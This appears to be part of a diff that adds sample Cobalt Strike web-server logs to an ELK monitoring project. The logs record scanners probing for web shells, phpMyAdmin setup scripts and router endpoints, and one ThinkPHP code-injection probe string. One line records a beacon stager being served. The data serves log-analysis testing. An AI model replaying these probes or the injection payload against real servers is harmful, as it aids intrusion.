unknown unknown [03/30 22:32:12 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +91.200.224.106 unknown unknown [03/30 23:31:53 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +196.52.43.54 unknown unknown [03/30 23:56:51 UTC] "GET /" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36" diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200331/weblog_80.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200331/weblog_80.log new file mode 100644 index 00000000..6f8b2a20 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200331/weblog_80.log @@ -0,0 +1,297 @@ +103.209.143.73 unknown unknown [03/31 00:02:56 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +103.217.106.86 unknown unknown [03/31 00:46:46 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +197.245.57.134 unknown unknown [03/31 00:59:58 UTC] "POST /boaform/admin/formPing" 404 0 "" "polaris botnet" +114.67.109.108 unknown unknown [03/31 01:01:27 UTC] "GET /TP/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +114.67.109.108 unknown unknown [03/31 01:01:28 UTC] "GET /TP/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +114.67.109.108 unknown unknown [03/31 01:01:28 UTC] "GET /thinkphp/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +114.67.109.108 unknown unknown [03/31 01:01:29 UTC] "GET /html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +114.67.109.108 unknown unknown [03/31 01:01:30 UTC] "GET /public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +114.67.109.108 unknown unknown [03/31 01:01:31 UTC] "GET /TP/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +114.67.109.108 unknown unknown [03/31 01:01:32 UTC] "GET /elrekt.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +114.67.109.108 unknown unknown [03/31 01:01:32 UTC] "GET /index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +114.67.109.108 unknown unknown [03/31 01:01:33 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +171.67.70.85 unknown unknown [03/31 01:16:21 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +114.35.90.78 unknown unknown [03/31 02:45:00 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +14.102.69.150 unknown unknown [03/31 03:02:49 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +128.14.209.178 unknown unknown [03/31 04:28:40 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" +138.118.100.171 unknown unknown [03/31 06:53:48 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +145.255.8.40 unknown unknown [03/31 07:12:43 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +171.67.70.85 unknown unknown [03/31 07:19:22 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +152.136.192.51 unknown unknown [03/31 07:59:24 UTC] "GET /" 404 0 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" +152.136.192.51 unknown unknown [03/31 07:59:24 UTC] "GET /robots.txt" 404 0 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" +152.136.192.51 unknown unknown [03/31 07:59:24 UTC] "POST /Admin9b3a47a7/Login.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" +152.136.192.51 unknown unknown [03/31 07:59:28 UTC] "GET /" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" +152.136.192.51 unknown unknown [03/31 07:59:28 UTC] "GET /l.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" +152.136.192.51 unknown unknown [03/31 07:59:28 UTC] "GET /phpinfo.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" +152.136.192.51 unknown unknown [03/31 07:59:29 UTC] "GET /test.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" +152.136.192.51 unknown unknown [03/31 07:59:32 UTC] "POST /index.php" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" +152.136.192.51 unknown unknown [03/31 07:59:33 UTC] "POST /bbs.php" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" +152.136.192.51 unknown unknown [03/31 07:59:36 UTC] "POST /forums.php" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" +152.136.192.51 unknown unknown [03/31 07:59:40 UTC] "POST /forum/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" +152.136.192.51 unknown unknown [03/31 07:59:40 UTC] "POST /forums/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" +152.136.192.51 unknown unknown [03/31 07:59:43 UTC] "POST /cgi-bin/php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +152.136.192.51 unknown unknown [03/31 07:59:44 UTC] "POST /cgi-bin/php5" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +152.136.192.51 unknown unknown [03/31 07:59:44 UTC] "POST /cgi-bin/php-cgi" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +152.136.192.51 unknown unknown [03/31 07:59:45 UTC] "POST /cgi-bin/php.cgi" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +152.136.192.51 unknown unknown [03/31 07:59:49 UTC] "POST /base/post.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" +152.136.192.51 unknown unknown [03/31 07:59:50 UTC] "GET /webdav/" 404 0 "" "Mozilla/5.0" +152.136.192.51 unknown unknown [03/31 07:59:51 UTC] "GET /ispirit/im/upload.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 07:59:52 UTC] "GET /help.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 07:59:56 UTC] "GET /_query.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 07:59:56 UTC] "GET /test.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 07:59:56 UTC] "GET /db_cts.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 07:59:57 UTC] "GET /db_pma.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 07:59:59 UTC] "GET /logon.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:01 UTC] "GET /help-e.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:03 UTC] "GET /license.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:04 UTC] "GET /log.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:04 UTC] "GET /hell.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:05 UTC] "GET /pmd_online.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:07 UTC] "GET /shell.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:08 UTC] "GET /htdocs.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:12 UTC] "GET /sane.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:12 UTC] "GET /desktop.ini.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:12 UTC] "GET /z.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:13 UTC] "GET /lala.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:17 UTC] "GET /lala-dpr.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:19 UTC] "GET /wpo.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:21 UTC] "GET /t6nv.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:24 UTC] "GET /text.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:24 UTC] "GET /wp-config.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:24 UTC] "GET /muhstik.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:29 UTC] "GET /muhstiks.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:32 UTC] "GET /muhstik-dpr.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:32 UTC] "GET /lol.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:37 UTC] "GET /cmd.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:43 UTC] "GET /cmdd.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:44 UTC] "GET /knal.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:48 UTC] "GET /shell.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:51 UTC] "GET /scripts/setup.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:52 UTC] "GET /phpmyadmin/scripts/setup.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:52 UTC] "GET /phpMyAdmin/scripts/setup.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:00 UTC] "GET /phpmyadmin/scripts/db___.init.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:00 UTC] "GET /phpMyAdmin/scripts/db___.init.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:04 UTC] "GET /pma/scripts/setup.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:04 UTC] "GET /PMA/scripts/setup.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:07 UTC] "GET /MyAdmin/scripts/setup.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:08 UTC] "GET /pma/scripts/db___.init.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:08 UTC] "GET /PMA/scripts/db___.init.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:13 UTC] "GET /MyAdmin/scripts/db___.init.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:16 UTC] "GET /plugins/weathermap/editor.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:20 UTC] "GET /cacti/plugins/weathermap/editor.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:23 UTC] "GET /index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:24 UTC] "GET /elrekt.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:24 UTC] "GET /App/" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:25 UTC] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))}" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:27 UTC] "GET /index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:28 UTC] "GET /" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:32 UTC] "GET /" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:32 UTC] "GET /joomla/" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:32 UTC] "GET /Joomla/" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:36 UTC] "GET /" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:39 UTC] "GET /rxr.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:43 UTC] "GET /home.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:47 UTC] "GET /spider.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:48 UTC] "GET /payload.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:48 UTC] "GET /composers.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:49 UTC] "GET /izom.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:52 UTC] "GET /composer.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:52 UTC] "GET /hue2.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:52 UTC] "GET /Drupal.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:53 UTC] "GET /lang.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:56 UTC] "GET /izom.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:59 UTC] "GET /new_license.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:00 UTC] "GET /images/!.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:00 UTC] "GET /images/vuln.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:03 UTC] "GET /images/up.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:07 UTC] "GET /images/jsspwneed.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:08 UTC] "GET /images/stories/cmd.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:08 UTC] "GET /images/stories/filemga.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:09 UTC] "GET /up.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:13 UTC] "GET /laravel.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:16 UTC] "GET /yu.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:16 UTC] "GET /floaw.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:16 UTC] "GET /ftmabc.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:17 UTC] "GET /doudou.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:19 UTC] "GET /xiaoxia.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:20 UTC] "GET /yuyang.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:20 UTC] "GET /zz.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:21 UTC] "GET /coonig.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:23 UTC] "GET /baidoubi.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:27 UTC] "GET /meijianxue.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:28 UTC] "GET /no1.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:31 UTC] "GET /woshimengmei.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:32 UTC] "GET /indea.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:35 UTC] "GET /xiaxia.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:36 UTC] "GET /kk.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:36 UTC] "GET /xsser.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:37 UTC] "GET /zzz.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:40 UTC] "GET /99.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:40 UTC] "GET /dp.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:44 UTC] "GET /1ts.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:48 UTC] "GET /haiyan.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:49 UTC] "GET /phpdm.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:52 UTC] "GET /root.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:52 UTC] "GET /5678.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:56 UTC] "GET /root11.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:59 UTC] "POST /wuwu11.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:05 UTC] "POST /xw1.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:08 UTC] "POST /wc.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:09 UTC] "POST /xx.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:12 UTC] "POST /s.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:12 UTC] "POST /w.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:12 UTC] "POST /sheep.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:13 UTC] "POST /qaq.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:15 UTC] "POST /my.php/" 200 208983 "beacon beacon stager x86" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:32 UTC] "POST /qq.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:36 UTC] "POST /hhh.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:36 UTC] "POST /jjj.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:36 UTC] "POST /vvv.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:40 UTC] "POST /www.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:44 UTC] "POST /ffr.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:44 UTC] "POST /411.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:56 UTC] "POST /444.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:56 UTC] "POST /a411.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:56 UTC] "POST /whoami.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:57 UTC] "POST /whoami.php.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:59 UTC] "POST /9.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:01 UTC] "POST /98k.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:04 UTC] "POST /981.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:08 UTC] "POST /887.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:08 UTC] 